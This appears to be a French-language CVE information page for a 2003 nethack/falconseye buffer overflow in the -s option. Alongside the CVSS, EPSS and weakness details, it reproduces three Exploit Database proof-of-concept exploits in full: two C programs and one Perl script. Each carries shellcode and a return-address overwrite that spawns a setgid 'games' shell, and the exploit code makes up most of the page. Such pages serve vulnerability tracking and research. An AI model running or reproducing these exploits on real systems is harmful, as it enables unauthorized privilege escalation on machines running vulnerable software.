Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Descriptions du CVE
Buffer overflow in (1) nethack 3.4.0 and earlier, and (2) falconseye 1.9.3 and earlier, which is based on nethack, allows local users to gain privileges via a long -s command line option.
Informations du CVE
Faiblesses connexes
| Nom de la faiblesse | Source | |
|---|---|---|
| Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') The product copies an input buffer to an output buffer without verifying that the size of the input buffer is less than the size of the output buffer, leading to a buffer overflow. |
Métriques
| Métriques | Score | Gravité | CVSS Vecteur | Source |
|---|---|---|---|---|
| V2 | 4.6 | AV:L/AC:L/Au:N/C:P/I:P/A:P | nvd@nist.gov |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 22233
Date de publication : 2003-02-09 23h00 +00:00
Auteur : tsao@efnet
EDB Vérifié : Yes
// source: https://www.securityfocus.com/bid/6806/info
By passing an overly large string when invoking nethack, it is possible to corrupt memory.
By exploiting this issue it may be possible for an attacker to overwrite values in sensitive areas of memory, resulting in the execution of arbitrary attacker-supplied code. As nethack may be installed setgid 'games' on various systems this may allow an attacker to gain elevated privileges.
slashem, jnethack and falconseye are also prone to this vulnerability.
/*
tsao@efnet #!IC@efnet 2k3
thnx to aleph1 for execve shellcode &
davidicke for setreuid() shellcode
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
char code[] =
"\x29\xc4\x31\xc0\x31\xc9\x31\xdb\xb3\x0c\x89\xd9\xb0\x46\xcd\x80"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
unsigned long sp(void) {
__asm__("movl %esp,%eax");
}
int main(int argc, char **argv) {
char *p;
int i, off;
p = malloc(sizeof(char) * atoi(argv[1]));
memset(p,0x90,atoi(argv[1]));
off = 220 - strlen(code);
printf("shellcode at %d->%d\n",off,off+strlen(code));
for(i=0;i<atoi(argv[1]);i++)
p[i+off] = code[i];
*(long *) &p[220] = sp() - atoi(argv[2]);
printf("Using %x\n",sp() - atoi(argv[2]));
execl("/usr/games/lib/nethackdir/nethack","nethack","-s",p,0);
perror("wtf");
}
Exploit Database EDB-ID : 22234
Date de publication : 2003-02-09 23h00 +00:00
Auteur : bob@dtors.net
EDB Vérifié : Yes
// source: https://www.securityfocus.com/bid/6806/info
By passing an overly large string when invoking nethack, it is possible to corrupt memory.
By exploiting this issue it may be possible for an attacker to overwrite values in sensitive areas of memory, resulting in the execution of arbitrary attacker-supplied code. As nethack may be installed setgid 'games' on various systems this may allow an attacker to gain elevated privileges.
slashem, jnethack and falconseye are also prone to this vulnerability.
/* DSR-nethack.c by bob@dtors.net
* Vulnerbility Found by tsao.
*
* Local BufferOverflow that leads
* to elevated privileges [games].
*
* Basic PoC code...nothing special.
*[bob@dtors bob]$ ./DSR-nethack
*
* DSR-nethack.c By bob.
* Local Exploit for Nethack 3.4.0
* DSR-[www.dtors.net]-DSR
*
* ret: 0xbffffd86
*
* Cannot find any current entries for
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.���
* Usage: nethack -s [-v] <playertypes> [maxrank] [playernames]
* Player types are: [-p role] [-r race]
* sh-2.05b$ id -a
* uid=12(games) gid=501(bob) groups=501(bob)
* sh-2.05b$
*
* www.dtors.net // www.b0f.net
*/
#include <stdio.h>
char shellcode[]= /* shellcode by bob */
"\x29\xc4\x31\xc0\x31\xc9\x31\xdb\xb3\x0c\x89\xd9\xb0\x46\xcd\x80" //minus
"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89"
"\xe3\x8d\x54\x24\x08\x50\x53\x8d\x0c\x24\xb0\x0b\xcd\x80";
int main ()
{
unsigned long ret = 0xbffffd86; //Redhat 8.0 i386
char buf[224];
char smeg[1024];
char *ptr;
int i=0;
fprintf(stdout, "\n\tDSR-nethack.c By bob.\n");
fprintf(stdout, "Local Exploit for Nethack 3.4.0\n");
fprintf(stdout, "\tDSR-[www.dtors.net]-DSR\n");
memset(buf, 0x41, sizeof(buf));
ptr = smeg;
for (i = 0; i < 1024 - strlen(shellcode) -1; i++) *(ptr++) = 0x90;
for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i];
smeg[1024 - 1] = '\0'; //null byte
memcpy(smeg,"EGG=",4);
putenv(smeg);
buf[220] = (ret & 0x000000ff);
buf[221] = (ret & 0x0000ff00) >> 8;
buf[222] = (ret & 0x00ff0000) >> 16;
buf[223] = (ret & 0xff000000) >> 24;
buf[224] = '\0';
fprintf(stdout,"ret: 0x%08x\n",ret);
execl("/usr/games/lib/nethackdir/nethack", "nethack", "-s", buf,
NULL); //weeoooweeeeooowooo
return 0;
}
Exploit Database EDB-ID : 22235
Date de publication : 2003-02-09 23h00 +00:00
Auteur : tsao@efnet
EDB Vérifié : Yes
source: https://www.securityfocus.com/bid/6806/info
By passing an overly large string when invoking nethack, it is possible to corrupt memory.
By exploiting this issue it may be possible for an attacker to overwrite values in sensitive areas of memory, resulting in the execution of arbitrary attacker-supplied code. As nethack may be installed setgid 'games' on various systems this may allow an attacker to gain elevated privileges.
slashem, jnethack and falconseye are also prone to this vulnerability.
#!/usr/bin/perl -w
#
# tsao@efnet #!IC@efnet 2k3
# thnx to aleph1 for execve shellcode
# davidicke for setreuid() shellcode
$sc .= "\x31\xdb\x31\xc9\xbb\xff\xff\xff\xff\xb1\x0c\x31\xc0\xb0\x46\xcd\x80\x31\xdb";
$sc .= "\x31\xc9\xb3\x0c\xb1\x0c\x31\xc0\xb0\x46\xcd\x80\xeb\x24\x5e\x8d\x1e\x89\x5e";
$sc .= "\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12";
$sc .= "\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff\x2f\x62";
$sc .= "\x69\x6e\x2f\x73\x68\x01";
for ($i = 0; $i < (224 - (length($sc)) - 4); $i++) {
$buf .= "\x90";
}
$buf .= $sc;
$buf .= "\xd2\xf8\xff\xbf";
exec("/usr/games/lib/nethackdir/nethack -s '$buf'");
Products Mentioned
Configuraton 0
Falconseye_project>>Falconseye >> Version To (including) 1.9.3
- Falconseye_project>>Falconseye >> Version - (Open CPE detail)
- Falconseye_project>>Falconseye >> Version 1.9.3 (Open CPE detail)
Nethack>>Nethack >> Version To (including) 3.4.0
- Nethack>>Nethack >> Version 3.2.2 (Open CPE detail)
- Nethack>>Nethack >> Version 3.2.3 (Open CPE detail)
- Nethack>>Nethack >> Version 3.3.0 (Open CPE detail)
- Nethack>>Nethack >> Version 3.4.0 (Open CPE detail)
Configuraton 0
Debian>>Debian_linux >> Version 2.2
- Debian>>Debian_linux >> Version 2.2 (Open CPE detail)
Debian>>Debian_linux >> Version 3.0
- Debian>>Debian_linux >> Version 3.0 (Open CPE detail)
Références
http://www.securityfocus.com/archive/1/311172/2003-02-08/2003-02-14/0
Tags : mailing-list, x_refsource_BUGTRAQ
Tags : mailing-list, x_refsource_BUGTRAQ
